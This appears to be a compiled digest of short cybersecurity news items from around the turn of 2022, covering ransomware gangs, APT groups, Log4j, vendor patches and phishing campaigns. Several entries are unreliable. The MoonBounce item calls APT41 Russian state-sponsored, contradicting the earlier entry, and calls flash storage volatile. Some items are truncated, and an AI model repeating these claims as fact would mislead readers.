    APT36, also known as Earth Karkaddan, a politically motivated advanced persistent threat (APT) group, has historically targeted Indian military and diplomatic resources. This APT group (also referred to as Operation C-Major, PROJECTM, Mythic Leopard, and Transparent Tribe) has been known to use social engineering and phishing lures as an entry point, after which, it deploys the Crimson RAT malware to steal information from its victims.

    F5 Fixes 25 Flaws in BIG-IP, BIG-IQ, and NGINX Products

    Cybersecurity firm F5 announced security patches for 25 vulnerabilities affecting its BIG-IP, BIG-IQ, and NGINX products. Most of the vulnerabilities (23) addressed by the company affect the BIG-IP application delivery controller (ADC), 13 of them have been rated as high-severity issues (CVSS score 7.5). The issues received CVEs between CVE-2022-23010 to CVE-2022-23032.

    FBI Warns of Malicious QR Used to Steal Your Money

    The Federal Bureau of Investigation (FBI) warned Americans this week that cybercriminals are using maliciously crafted Quick Response (QR) codes to steal their credentials and financial info. The warning was issued as a public service announcement (PSA) published on the Bureau's Internet Crime Complaint Center (IC3) earlier this week.

    FBI Warning: Divavol Ransomware Makes Demands of up to $500,000, Trickbot Links

    The FBI discovered that the Diavol ransomware uses the same method to fingerprint victim machines as Trickbot and Trickbot-related Anchor DNS malware, "Trickbot's tools include the Anchor_DNS backdoor, a tool for transmitting data between victim machines and Trickbot-controlled servers using Domain Name System (DNS) tunneling to hide malicious traffic with normal DNS traffic

    Linux Kernel Privilege Escalation Bug Found and Fixed

    “To exploit it requires the CAP_SYS_ADMIN privilege to be enabled. If that's the case, an unprivileged local user can open a filesystem that does not support the File System Context application programming interface (API). In this situation, it drops back to legacy handling, and from there, the flaw can escalate an attacker's system privileges, (SecList, 2022).“ “Researchers discovered a heap overflow bug in the legacy_parse_param in the Linux kernel's fs/fs_context.c program. This parameter is used in Linux filesystems during superblock creation for mount and superblock reconfiguration for a remount. The superblock records all of a filesystem's characteristics such as file size, block size, empty and filled storage blocks. So, yeah, it's important.

    WordPress Plugin Flaw Puts Users of 20,000 Sites at Phishing Risk

    A high-severity bug in the WordPress Email Template Designer WP HTML Mail, installed in more than 20,000 websites, can lead to code injection and the distribution of persuasive phishing emails. WordPress WP HTML Mail is a plugin for creating tailored emails, contact form alerts, and other custom messages digital platforms send to their customers. WP HTML Mail is compatible with WooCommerce, Ninja Forms, BuddyPress, and other popular WordPress plugins. Even though the number of websites that use it is small, many of them have large audiences, causing the vulnerability to affect numerous users.

    ‘Anomalous’ Spyware Targets Industrial Companies

    Several campaigns employing spyware have come to light, a new report shows. Researchers name these cyberattacks "Anomalous." The threat actors' targets are industrial enterprises, and their final goal consists of email accounts, credential theft, financial fraud, or even the reselling of this spyware to other hackers. Kaspersky researchers noted that the threat actors used various spyware strains to remain undetected. Threat actors were observed rotating spyware for specific periods. It's likely that if endpoint solutions discovered spyware running on a targeted machine, they deployed a variant to evade detection.

    McAfee Agent Bug Lets Hackers Run Code with Windows SYSTEM privileges

    McAfee has patched a security vulnerability discovered in the company's McAfee Agent software for Windows enabling attackers to escalate privileges and execute arbitrary code with SYSTEM privileges. McAfee Agent is a client-side component of McAfee ePolicy Orchestrator (McAfee ePO) that downloads and enforces endpoint policies and deploys antivirus signatures, upgrades, patches, and new products on enterprise endpoints.

    New White Rabbit Ransomware Linked to FIN8 Hacking Group

    A new ransomware family called 'White Rabbit' appeared in the wild recently, and according to recent research findings, could be a side-operation of the FIN8 hacking group. FIN8 is a financially motivated actor who has been spotted targeting financial organizations for several years, primarily by deploying POS malware that can steal credit card details” (Bleeping Computer, 2022). Researchers from TrendMicro analyzed a sample of White Rabbit obtained from an attack on a US bank back in December of 2021. The ransomware executable is a small 100 KB file that requires a password to be entered, a technique also used by other ransomware strains including Egregor, MegaCortex, and SamSam.

    Ransomware: 2,300+ Local Governments, Schools, Healthcare Providers Impacted in 2021

    More than 2,300 local governments, schools, and healthcare organizations in the US were affected by ransomware attacks in 2021, according to a new report from security company Emsisoft. The company found that at least 77 state and municipal governments, 1,043 schools, and 1,203 healthcare providers were impacted by a ransomware incident last year. The attacks also led to 118 data breaches, exposing troves of sensitive information

    Joint Law Enforcement Action Takes Down VPN Service

    An international law enforcement collaboration has targeted the users and infrastructure of VPNLab.net, rendering it no longer available. The action was taken in response to the use of the VPN provider’s service to support cybercrime activities, including ransomware deployment” (Info Security Magazine, 2022). A total of 10 national law enforcement agencies coordinated the takedown, including those from Germany, the Netherlands, Canada, the Czech Republic, France, Hungary, Latvia, Ukraine, the US and the UK. The seizure led to the disruption of 15 servers hosted by VPNLab[.]net. VPNLab was a popular service used by cybercriminals to set up infrastructure and communications for ransomware campaigns. In many cases the service was being advertised on the dark web. During their investigation, law enforcement identifies over 100 businesses at risk of cyber attacks, they are working with impacted organizations to mitigate their risks.

    Office 365 Phishing Attack Impersonates the US Department of Labor

    A new phishing campaign impersonating the United States Department of Labor asks recipients to submit bids to steal Office 365 credentials. The phishing campaign has been ongoing for at least a couple of months and utilizes over ten different phishing sites impersonating the government agency. The emails are sent from spoofed domains that look as if they came from the actual Department of Labor (DoL) site, while some are based on a set of newly created look-alike domains such as: dol-gov[.]com dol-gov[.]us bids-dolgov[.]us Most of the emails pass through abused servers owned by non-profit organizations to evade email security blocks.

    New Moonbounce UEFI Malware Used by APT41 in Targeted Attacks

    Security analysts have discovered and linked MoonBounce, "the most advanced" UEFI firmware implant found in the wild so far, to the Chinese-speaking APT41 hacker group (also known as Winnti). APT41 is a notorious hacking group that has been active for at least a decade and is primarily known for its stealthy cyber-espionage operations against high-profile organizations from various industry sectors.

    UEFI Malware Used by APT41 in Targeted Attacks

    BIOS and UEFI attacks are not new by any means, but APT41 (also known as Winnti), a Russian state-sponsored cybercriminal group, according to security experts, has created the most devastating and complex version to date. Moonbounce implants malware on the SPI Flash memory of a computer's mother or logic board, also known as flash storage. This type of memory is embedded in storage and data transfers in portable devices, including phones, tablets, media players, and industrial machines like security systems and medical products. Flash storage is volatile, which means that it can be electrically erased and reprogrammed, and data stored on them is not lost when power is turned off.

    Defending Users’ NAS Devices From Evolving Threats

    Threats to the internet of things (IoT) continue to evolve as users and businesses grow increasingly reliant on these tools for constant connectivity, access to information and data, and workflow continuity. Cybercriminals have taken notice of this dependence and now regularly update their known tools and routines to include network-attached storage (NAS) devices to their list of targets, knowing full well that users rely on these devices for storing and backing up files in both modern homes and businesses. More importantly, cybercriminals are aware that these tools hold valuable information and have only minimal security measures.

    SolarWinds Serv-U Bug Exploited for Log4j Attacks

    While exploitation of this vulnerability remains highly limited, it could be adopted by other threat actors. While I would normally rank this as a low severity incident, the popularity of Serv-U should be taken into consideration, hence, I would treat this as Medium. There is still some disagreement about the exploitation Microsoft observed, we will continue to update on the situation.

    RRD Suffers Data Theft in a Conti Ransomware Attack

    R.R. Donnelley is a Fortune 500 integrated communications corporation based in the United States that offers marketing and business communications, commercial printing, and other associated services. The company’s corporate offices are in Chicago, Illinois, in the United States. R.R. Donnelley was the world’s largest commercial printer in 2007.

    Red Cross Suffers Massive Cyber Attack

    The international humanitarian organization Red Cross announced yesterday that it had been the victim of a massive cyberattack that resulted in the theft of confidential information for over 515,000 “very vulnerable people” participating in the “Restoring Family Links” program.

    Former DHS Official Charged with Stealing Govt Employees' PII

    A former Department of Homeland Security acting inspector general pleaded guilty today to stealing confidential and proprietary software and sensitive databases from the US government containing employees' personal identifying information (PII). 61-year-old Charles Kumar Edwards coordinated the scheme while working for DHS-OIG (Department of Homeland Security, Office of Inspector General) as an employee and acting IG between February 2008 and December 2013.

    FCC Wants New Data Breach Reporting Rules for Telecom Carriers

    The Federal Communications Commission (FCC) has proposed more rigorous data breach reporting requirements for telecom carriers in response to breaches that recently hit the telecommunications industry. On Wednesday, Chairwoman Jessica Rosenworcel shared the proposal in the form of a Notice of Proposed Rulemaking (NPRM), the first step in changing the FCC's rules for alerting federal agencies and customers of data breaches.

    A 'Massive' Hacking Attack Has Hit Government Websites in Ukraine

    A 'massive' cyberattack has taken down several government websites in Ukraine, including the Ukrainian Foreign Ministry and the Ministry of Education and Science. The cyberattack occurred overnight on Thursday and Friday morning, and it took down more than a dozen official websites, disrupting government work and raising questions about whether Russia was signaling that a new offensive against Ukraine was getting underway. A statement by Ukranian police says cyber attackers left "provocative messages" on the main pages of government websites, which have been taken offline – but no personal data has been altered or stolen.

    Cisco Releases Patch for Critical Bug Affecting Unified CCMP and Unified CCDM

    Cisco Systems has rolled out security updates for a critical security vulnerability affecting Unified Contact Center Management Portal (Unified CCMP) and Unified Contact Center Domain Manager (Unified CCDM) that could be exploited by a remote attacker to take control of an affected system. Tracked as CVE-2022-20658, the vulnerability has been rated 9.6 in severity on the CVSS scoring system, and concerns a privilege escalation flaw arising out of a lack of server-side validation of user permissions that could be weaponized to create rogue Administrator accounts by submitting a crafted HTTP request.

    Free Unofficial Patch for Windows ‘RemotePotato0’ Now Available

    The privilege escalation flaw was discovered by an expert from Sentinel LABS, by his name Antonio Cocomazzi together with Andrea Pierini, an independent researcher. They named it RemotePotato0 and disclosed it during the month of April last year. An unofficial patch was released for a privilege escalation vulnerability that has an impact on all versions of Windows after Microsoft tagged its status as “won’t fix”. The flaw is located in the Windows RPC Protocol and was dubbed RemotePotato0 by security researchers. If successfully exploited, threat actors could perform an NTLM relay attack that will give them domain admin privileges.

    US Links MuddyWater Hacking Group to Iranian Intelligence Agency

    US Cyber Command (USCYBERCOM) has officially linked the Iranian-backed MuddyWatter hacking group to Iran's Ministry of Intelligence and Security (MOIS). MOIS is the Iran government's leading intelligence agency, tasked with coordinating the country's intelligence and counterintelligence, as well as covert actions supporting the Islamic regime's goals beyond Iran's borders.

    KCodes NetUSB Flaw Impacts Millions of SOHO Routers

    Cybersecurity researchers from SentinelOne have discovered a critical vulnerability (CVE-2021-45608) in KCodes NetUSB component that is present in millions of end-user routers from different vendors, including Netgear, TP-Link, Tenda, EDiMAX, D-Link, and Western Digital.

    Jail’s Inability to Deal With Cyberattack Could Violate the Constitutional Rights of Inmates

    A prison in New Mexico had an unplanned lockdown due to a ransomware attack. As reported by Source NM, the Metropolitan Detention Center in Bernalillo County, New Mexico, went into lockdown on January 5, 2022, after cyberattackers infiltrated Bernalillo County systems and deployed malware. Inmates were made to stay in their cells as the ransomware outbreak reportedly not only knocked out the establishment's internet but also locked staff out of data management servers and security camera networks.

    Microsoft RDP Bug Enables Data Theft, Smart-Card Hijacking

    Microsoft Windows systems going back to at least Windows Server 2012 R2 are affected by a vulnerability in the Remote Desktop Services protocol that gives attackers, connected to a remote system via RDP, a way to gain file system access on the machines of other connected users. Threat actors that exploit the flaw can view and modify clipboard data or impersonate the identities of other users logged in to the machine in order to escalate privileges or to move laterally on the network, researchers from CyberArk discovered recently. They reported the issue to Microsoft, which issued a patch for the flaw (CVE-2022-21893) in its security update for January this Tuesday.

    First Patch Tuesday of 2022 Brings Fix for a Critical 'Wormable' Windows Vulnerability

    Of the 96 vulnerabilities, nine are rated Critical and 89 are rated Important in severity, with six zero-day publicly known at the time of the release. This is in addition to 29 issues patched in Microsoft Edge on January 6, 2022. None of the disclosed bugs are listed as under attack. The patches cover a swath of the computing giant's portfolio, including Microsoft Windows and Windows Components, Exchange Server, Microsoft Office and Office Components, SharePoint Server, .NET Framework, Microsoft Dynamics, Open-Source Software, Windows Hyper-V, Windows Defender, and Windows Remote Desktop Protocol (RDP)

    KCodes NetUSB Kernel Remote Code Execution Flaw Impacts Millions of Devices

    A high-impact vulnerability allowing remote code execution to take place has impacted millions of end-user router devices. On Tuesday, SentinelOne published an analysis of the bug, tracked as CVE-2021-45388 and deemed critical by the research team. The vulnerability impacts the KCodes NetUSB kernel module. KCodes solutions are licensed by numerous hardware vendors to provide USB over IP functionality in products including routers, printers, and flash storage devices.

    Extortion DDoS Attacks Grow Stronger And More Common

    In the fourth quarter of last year, about a quarter of Cloudflare's customers that were the target of a DDoS attack said that they received a ransom note from the perpetrator. A large portion of these attacks occurred in December 2021, when almost a third of Cloudflare customers reported receiving a ransom letter. By comparison with the previous month, the number of reported DDoS ransom attacks was double, Cloudflare says in a blog post today.

    Four Million Outdated log4j Downloads Were Served from Apache Maven Central

    There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository. That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks.

    Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure

    CISA, the FBI, and NSA encourage the cybersecurity community—especially critical infrastructure network defenders—to adopt a heightened state of awareness and to conduct proactive threat hunting, as outlined in the Detection section. Additionally, CISA, the FBI, and NSA strongly urge network defenders to implement the recommendations listed below and detailed in the Mitigations section. These mitigations will help organizations improve their functional resilience by reducing the risk of compromise or severe business degradation.

    If Hackers Are Exploiting the log4j Flaw, CISA Says We Might Not Know Yet

    Federal officials cautioned Monday that, while the widespread Log4j vulnerability hasn’t led to any major known intrusions in the U.S., there could be a “lag” between when the flaw became known, and when attackers exploit it. Cybersecurity and Infrastructure Security Agency Director Jen Easterly said that there were months between the discovery of the vulnerability that led to the 2017 Equifax breach, which exposed the personal information of nearly 150 million Americans, and word of the breach itself, invoking one of the most notable hacks in history.

    US NCSC and DoS Share Best Practices Against Surveillance Tools

    The US National Counterintelligence and Security Center (NCSC) and the Department of State have published joint guidance that provides best practices on defending against attacks carried out by threat actors using commercial surveillance tools. In the last few years, we have reported several cases of companies selling commercial surveillance tools to governments and other entities that have used them for malicious purposes

    SonicWall Email Security and Firewall Products Impacted by the Y2K22 Vulnerability

    Last week, Internet appliances provider SonicWall revealed that the Y2K22 weakness has affected several of its email security and firewall products, leading to message log updates and junk box malfunctions starting January 1st, 2022. Although SonicWall didn’t give any details on what is causing the Y2K22 vulnerability in its security solutions, the tech company is not the only one dealing with this problem.

    Researchers Find Bugs in Over A Dozen Widely Used URL Parser Libraries

    In a deep-dive analysis jointly conducted by cybersecurity firms Claroty and Synk, eight security vulnerabilities were identified in as many third-party libraries written in C, JavaScript, PHP, Python, and Ruby languages and used by several web applications. With URLs being a fundamental mechanism by which resources — located either locally or on the web — can be requested and retrieved, differences in how the parsing libraries interpret a URL request could pose significant risk for users.

    Chinese Scientist Pleads Guilty to Stealing US Agricultural Tech

    A Chinese national has pleaded guilty to the theft of agricultural secrets from the US, intended to reach the hands of scientists across the pond. Xiang Haitao, formerly living in Chesterfield, Missouri, assumed a post at Monsanto and its subsidiary, The Climate Corporation, between 2008 and 2017, the US Department of Justice (DoJ) said on Thursday. Monsanto and The Climate Corporation developed an online platform for farmers to manage field and yield information in a bid to improve land productivity. One aspect of this technology was an algorithm called the Nutrient Optimizer, which US prosecutors say was considered "a valuable trade secret and their intellectual property

    Night Sky, A New Ransomware Operation in the Threat Landscape

    Researchers from MalwareHunterteam first spotted a new ransomware family dubbed Night Sky that implements a double extortion model in attacks aimed at businesses. Once encrypted a file, the ransomware appends the ‘.nightsky‘ extension to encrypted file names. The ransomware gang started its operations on December 27, 2021, and has already hacked the corporate networks of two organizations from Bangladesh and Japan respectively. The gang has also set up a leak site on the Tor network where it will publish files stolen to the victims that will not pay the ransom.

    New Mexico's Bernalillo County Investigates Ransomware Attack

    Bernalillo County is the most populous in New Mexico and includes the cities of Albuquerque, Los Ranchos, and Tijeras. Officials report the disruption likely occurred between midnight and 5:30 a.m. on Jan. 5. They have taken affected systems offline and severed network connections, as well as notified county system vendors, which are working to solve the issue and restore system functionality.

    QNAP Warns of Ransomware Targeting Internet-Exposed NAS Devices

    QNAP has warned customers today to secure Internet-exposed network-attached storage (NAS) devices immediately from ongoing ransomware and brute-force attacks. If your organization's NAS is exposed to the Internet it is likely to be targeted if the following text is displayed on the software’s dashboard, “The System Administration service can be directly accessible from an external IP address via the following protocols: HTTP

    Have I Been Pwned Warns of Datpiff Data Breach Impacting Millions

    DatPiff is a popular mixtape hosting service used by over 15 million users, allowing unregistered users to download or upload samples for free. The cracked passwords for almost 7.5 million members are being sold online, and users can check if they are part of the data breach through the Have I Been Pwned notification service.

    Phishing Campaign Leverages Covid-Induced Adjustments to Banking Practices

    This is another example of attackers leveraging covid and a well-designed phishing page to launch a dangerous campaign. Covid-themed phishing emails have convinced users to relinquish valuable credentials throughout the last year. Phish impersonating major banking firms have been around for some time, but they constantly evolve. The pandemic is continuing to affect the lives of everyone in the world, and threat actors are attempting to hook their targets by relying on changes in banking practices related to the pandemic.

    New Mac Malware Samples Underscore Growing Threat

    For the sixth year in a row, security researcher Patrick Wardle has released a list of all the new Mac malware threats that emerged over the course of a year. For each malware sample, Wardle identified the malware's infection vector, installation and persistence mechanisms, and other features, such as the purpose of the malware. A sample of each new Mac malware sample that surfaced last year is available on his website

    FTC Warns Companies to Secure Consumer Data from Log4J Attacks

    The US Federal Trade Commission (FTC) has warned today that it will go after any US company that fails to protect its customers' data against ongoing Log4J attacks."The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future," the US government agency said

    Microsoft Code-sign Check Bypassed to Drop Zloader Malware

    A new Zloader campaign exploits Microsoft's digital signature verification to deploy malware payloads and steal user credentials from thousands of victims from 111 countries. The campaign orchestrated by a threat group known as MalSmoke appears to have started in November 2021, and it's still going strong, according to Check Point researchers who have spotted it

    Researchers Used Electromagnetic Signals to Classify Malware Infecting IoT Devices

    A team of academics (Duy-Phuc Pham, Damien Marion, Matthieu Mastio and Annelie Heuser) from the Research Institute of Computer Science and Random Systems (IRISA) have devised a new approach that analyzes electromagnetic field emanations from the Internet of Things (IoT) devices to detect highly evasive malware. The team of experts presented their technique at the Annual Computer Security Applications Conference (ACSAC) that took place in December

    This iOS 15 Bug Could Crash Your iPhone Permanently

    A security researcher has publicly disclosed a bug present in iOS 15.2 (and going back to iOS 14.7 and possibly earlier) relating to HomeKit that could be used to permanently crash an iPhone. Trevor Spiniolas found that by changing the name of a HomeKit device to a large string (Spiniolas used 500,000 characters for the testing), this would crash the associated iPhone

    Monopoly market potentially exit scamming

    The decentralised darknet market, Monopoly, appears to be exit scamming. Monopoly has been open for two years and had gained a reputation for being stable. This was in large part due to its unique method of vendor verification which was believed to keep vendor scamming to a minimum.

    Log4j Highlights Need for Better Handle on Software Dependencies

    Security experts learned a lot from the fallout of Log4Shell. Most importantly, the incident highlighted the need for organizations to “understand and manage” what code is running within their software environments. Software dependencies exist in just about every enterprise product, when flaws emerge in these dependencies, organizations are left scrambling for fixes. Third party dependencies are essential in creating modern day programs as programmers do not have to reinvent the wheel every time a new product or application is developed. By mixing and matching existing libraries and packages, software developers can build new applications more efficiently.

    UK Defence Academy Attack Forced IT Rebuild – Report

    A possible nation-state attack on the UK’s primary defense training facility last year forced the academy to rebuild its IT infrastructure, according to a former senior officer. “Air marshal Edward Stringer served as director-general of joint force development and of the UK Defence Academy before recently retiring. The academy trains nearly 30,000 UK armed forces personnel annually, alongside civil servants and military staff from other nations. However, it was caught out by a cyber-attack last March, which had “significant” operational consequences, Stringer told Sky News

    Why the UK’s Energy Sector is Fragile and Ripe to Cyber Attacks

    For the first time in a generation, the UK is in the middle of an unprecedented supply chain crisis, and in recent weeks, we have seen very clearly the immediate and far-reaching impacts of it. Whether it’s the shortage of truck drivers prompting panic-buying at fuel stations that required military intervention, or the ramp up of materials and goods stockpiling UK businesses are doing to cope with shortages during the festive season, never has the UK’s supply chain system been stretched so thin. There are real fears this could rip through an economy that has only just started recovering from COVID-19

    Purple Fox Malware Distributed via Malicious Telegram Installers

    A malicious Telegram for Desktop installer distributes the Purple Fox malware to install further malicious payloads on infected devices. The installer is a compiled AutoIt script named "Telegram Desktop.exe" that drops two files, an actual Telegram installer, and a malicious downloader. While the legitimate Telegram installer dropped alongside the downloader isn't executed, the AutoIT program does run the downloader.

    Don't Copy-paste Commands from Webpages — You Can Get Hacked

    Programmers, sysadmins, security researchers, and tech hobbyists copying-pasting commands from web pages into a console or terminal are warned they risk having their system compromised. A technologist demonstrates a simple trick that'll make you think twice before copying and pasting text from web pages” (Bleeping Computer, 2022). Recently, Gabriel Friedlander, founder of security awareness training platform Wizer demonstrated an obvious yet surprising hack that'll make you cautious of copying-pasting commands from web pages. It isn't unusual for novice and skilled developers alike to copy commonly used commands from a webpage (StackOverflow) and paste them into their applications, a Windows command prompt or a Linux terminal.

    Microsoft Rolled Out Emergency Fix for Y2k22 Bug in Exchange Servers

    Microsoft has rolled out an emergency fix that addresses the Y2k22 bug that is breaking email delivery on on-premise Microsoft Exchange servers since January 1st, 2022. We have addressed the issue causing messages to be stuck in transport queues of on-premises Exchange Server 2016 and Exchange Server 2019. The problem relates to a date check failure with the change of the new year and it is not a failure of the AV engine itself. This is not an issue with malware scanning or the malware engine, and it is not a security-related issue.” reads the post published by Microsoft. “The version checking performed against the signature file is causing the malware engine to crash, resulting in messages being stuck in transport queues

    UK Security Agency Shares 225M Passwords With 'Have I Been Pwned'

    The UK's National Crime Agency (NCA) and National Cyber Crime Unit (NCCU) have contributed 225 million new compromised emails and associated passwords with Have I Been Pwned (HIBP), a free service that tracks stolen credentials so people can know if theirs have been breached. During recent NCA operations, the NCCU's Mitigation@Scale team identified more than 585.5 million potentially compromised credentials (emails and associated passwords), which were in a compromised cloud storage facility. In a statement on HIBP, the NCA says analysis revealed the credentials represented an accumulation of known and unknown datasets

    3 Reasons Why You Should Fuzz Your Christmas Tree

    Christmas trees are often decorated with smart lights that are connected to Wi-Fi. Vulnerabilities in such hardware can be an entry point for attackers who want to hack Christmas. How easily such vulnerabilities can be exploited became clear in a 2018 study, in which security researchers managed to completely shut down Christmas decorations remotely. In other instances, IoT devices were hacked over the cloud and even set on fire.

    Logistics Giant Warns of Scams Following Ransomware Attack

    Hellmann is one of the largest international logistics providers. Founded in 1871, it handles 16 million shipments per year by air, sea, road, and rail, and is active in 173 countries. The logistics giant s has issued a warning that data was stolen from the company when it was hit with a ransomware attack on December 9, 2021. It is not entirely clear what type of data was extracted, but the company says it is warning partners and customers to double check their communications with it, as a precaution. Criminals could use the leaked data to make social engineering attacks more believable, so Hellmann is asking people that do business with it to look out for fraudulent mails and calls.

    Apache’s New Security Update for HTTP Server Fixes Two Flaws

    Apache HTTP Server is the second most widely used web server on the internet behind Nginx, according to W3Techs, which estimates it's used by 31.4% of the world's websites. UK security firm Netcraft estimates 283 million websites used Apache HTTP Server in December 2021, representing 24% of all web servers. The Apache Software Foundation has released an update to address a critical flaw in its hugely popular web server that allows remote attackers to take control of a vulnerable system.

    Alibaba Suffers Government Crackdown Over Log4j

    Chinese tech giant Alibaba has reportedly been shunned by China’s top tech regulator for failing to report the infamous Log4j vulnerability quickly enough. Local media claimed that the firm’s Alibaba Cloud business, which has a large team of security researchers, failed to report the issue to the Ministry of Industry and Information Technology (MIIT)

    Russia and Ukraine: avoiding war

    As 2021 draws to a close, there are increasing fears around the world that Russia is planning to invade Ukraine in an effort to prevent its former ally from moving further towards the West and possibly even joining the NATO military alliance. The tensions between these two former Soviet states are now at a critical point, with the potential to evolve into further, more widespread conflict between Russia and the West.

    The Pysa Ransomware Strain Just Started Targeting Lots More Businesses

    The relatively new Pysa ransomware was the dominant strain behind file-encrypting attacks in November and saw a 400% rise in attacks on government organizations, according to an analysis by security company NCC Group. Pysa is one of the ransomware gangs utilizing double extortion to pressure victims to pay an extortion demand and dump leaks from 50 previously compromised organizations last month. Overall in November, the number of Pysa attacks increased 50%, which means it overtook Conti to join Lockbit in the top two most common versions of the malware. Conti and Lockbit have been the dominant strains since August, according to NCC Group.

    Russian National Extradited to US for Trading on Stolen Information

    The Russian national Vladislav Klyushin (41) was extradited to the United States from Switzerland to face charges for his alleged role in a scheme whose participants traded on information stolen from U.S. companies. The man was arrested in Switzerland on March 21, 2021, along with four other accomplices he conspired to gain unauthorized access to computers and to commit wire fraud and securities fraud.

    New joint advisory from CISA, FBI, NSA, and the other Five Eyes (Australia, Canada, New Zealand, UK)

    The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), National Security Agency (NSA), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), the Computer Emergency Response Team New Zealand (CERT NZ), the New Zealand National Cyber Security Centre (NZ NCSC), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) are releasing this joint Cybersecurity Advisory (CSA) to provide mitigation guidance on addressing vulnerabilities in Apache’s Log4j software library: CVE-2021-44228 (known as “Log4Shell”), CVE-2021-45046, and CVE-2021-45105. Sophisticated cyber threat actors are actively scanning networks to potentially exploit Log4Shell, CVE-2021-45046, and CVE-2021-45105 in vulnerable systems. According to public reporting, Log4Shell and CVE-2021-45046 are being actively exploited. CISA, in collaboration with industry members of CISA’s Joint Cyber Defense Collaborative (JCDC), previously published guidance on Log4Shell for vendors and affected organizations in which CISA recommended that affected organizations immediately apply appropriate patches (or apply workarounds if unable to upgrade), conduct a security review, and report compromises to CISA or the FBI. CISA also issued an Emergency Directive directing U.S. federal civilian executive branch (FCEB) agencies to immediately mitigate Log4j vulnerabilities in solution stacks that accept data from the internet. This joint CSA expands on the previously published guidance by detailing steps that vendors and organizations with IT and/or cloud assets should take to reduce the risk posed by these vulnerabilities. These steps include:

    • Identifying assets affected by Log4Shell and other Log4j-related vulnerabilities,
    • Upgrading Log4j assets and affected products to the latest version as soon as patches are available and remaining alert to vendor software updates, and
    • Initiating hunt and incident response procedures to detect possible Log4Shell exploitation.

    Four Bugs in Microsoft Teams Left Platform Vulnerable Since March

    Researchers from Positive Technologies, a leading global provider of enterprise security solutions for vulnerability and compliance management, incident and threat analysis, and application protection, discovered four vulnerabilities in Microsoft Teams that could be leveraged for various malicious purposes. Microsoft Teams is a collaboration tool that helps people working in different geographic locations work together online. For this reason, Team's usage of the platform has risen during the pandemic, making it an increasingly attractive target for threat actors.

    2easy Now a Significant Dark Web Marketplace for Stolen Data

    This particular dark web marketplace has grown significantly over the past few years; by automating processes, owners have increased sales volume and overall customer satisfaction. They have removed the one-on-one interaction with sellers and posters of stolen data altogether; anyone can create an account, add money to their wallet, and make purchases without interacting with the sellers directly.

    Threat Actors Continue to Leverage Log4J

    The Conti ransomware gang, which became the first professional crimeware outfit to adopt and weaponize the Log4J Shell vulnerability last week, has built up a holistic attack chain. The sophisticated Russia-based Conti group – which Palo Alto Networks has called "one of the most ruthless" of dozens of ransomware groups currently known to be active – was in the right place at the right time with the right tools when Log4 Shell hit the scene 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a report shared with Threatpost on Thursday.

    FBI: Hackers Are Actively Exploiting This Flaw on Manageengine Desktop Central Servers

    We received an alert from the FBI last Friday regarding a Zero-Day vulnerability in Zoho ManageEngine Desktop Central, CVE-2021-44515. ManageEngine is the enterprise IT management software division of Zoho, a company well known for its software-as-a-service products. The flaw affects Desktop Central software for both enterprise customers and the version for managed service provider (MSP) customers.

    Third Log4J Bug Can Trigger DoS; Apache Issues Patch

    No, you’re not seeing triple: On Friday, Apache released yet another patch – version 2.17 – for yet another flaw in the ubiquitous log4j logging library, this time for a DoS bug. Trouble comes in threes, and this is the third one for log4j. The latest bug isn’t a variant of the Log4Shell remote-code execution (RCE) bug that’s plagued IT teams since Dec. 10, coming under active attack worldwide within hours of its public disclosure, spawning even nastier mutations and leading to the potential for denial-of-service (DoS) in Apache’s initial patch.

    Ukrainian War Games Test Electricity Grid

    Hundreds of Ukrainian cyber experts have taken part in a large-scale incident response exercise against the country’s energy grid as geopolitical tensions with Russia continue to escalate. President Putin on Friday issued a series of security demands, including that NATO limits deployments of troops and weapons to Ukraine’s eastern border with Russia and that the country commits to never joining the military alliance. It warned of a military crisis in the region if its demands weren’t met. Russia has already massed 100,000 troops, alongside missiles and artillery, on its side of the border

    A New Attack Vector Exploits the Log4Shell Vulnerability on Servers Locally

    Researchers from cybersecurity firm Blumira devised a new attack vector that relies on a Javascript WebSocket connection to exploit the Log4Shell vulnerability on internal and locally exposed unpatched Log4j applications. Experts pointed out that this new attack vector significantly expands the attack surface and can impact services even running as localhost which were not exposed to any network.

    APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central

    APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central Summary Since at least late October 2021, APT actors have been actively exploiting a zero-day, now identified as CVE-2021-44515, on ManageEngine Desktop Central servers. The APT actors were observed compromising Desktop Central servers, dropping a webshell that overrides a legitimate function of Desktop Central, downloading post-exploitation tools, enumerating domain users and groups, conducting network reconnaissance, attempting lateral movement and dumping credentials.

    Holiday White House Letter Emphasizes the Importance of a Sense Heightened Security

    The holidays are an opportunity to spend time with our loved ones and enjoy some well-earned rest. Unfortunately, malicious cyber actors are not taking a holiday – and they can ruin ours if we’re not prepared and protected. Historically we have seen breaches around national holidays because criminals know that security operations centers are often short-staffed, delaying the discovery of intrusions. Beyond the holidays, though, we’ve experienced numerous recent events that highlight the strategic risks we all face because of the fragility of digital infrastructure and the ever- present threat of those who would use it for malicious purposes.

    Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges

    Microsoft and Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit the Log4j vulnerabilities, "MSTIC has observed PHOSPHORUS, an Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications. In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their specific targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with the testing activity to fingerprint systems.

    Log4j Flaw: Now State-Backed Hackers Are Using Bugs as Part of Attacks, Warns Microsoft

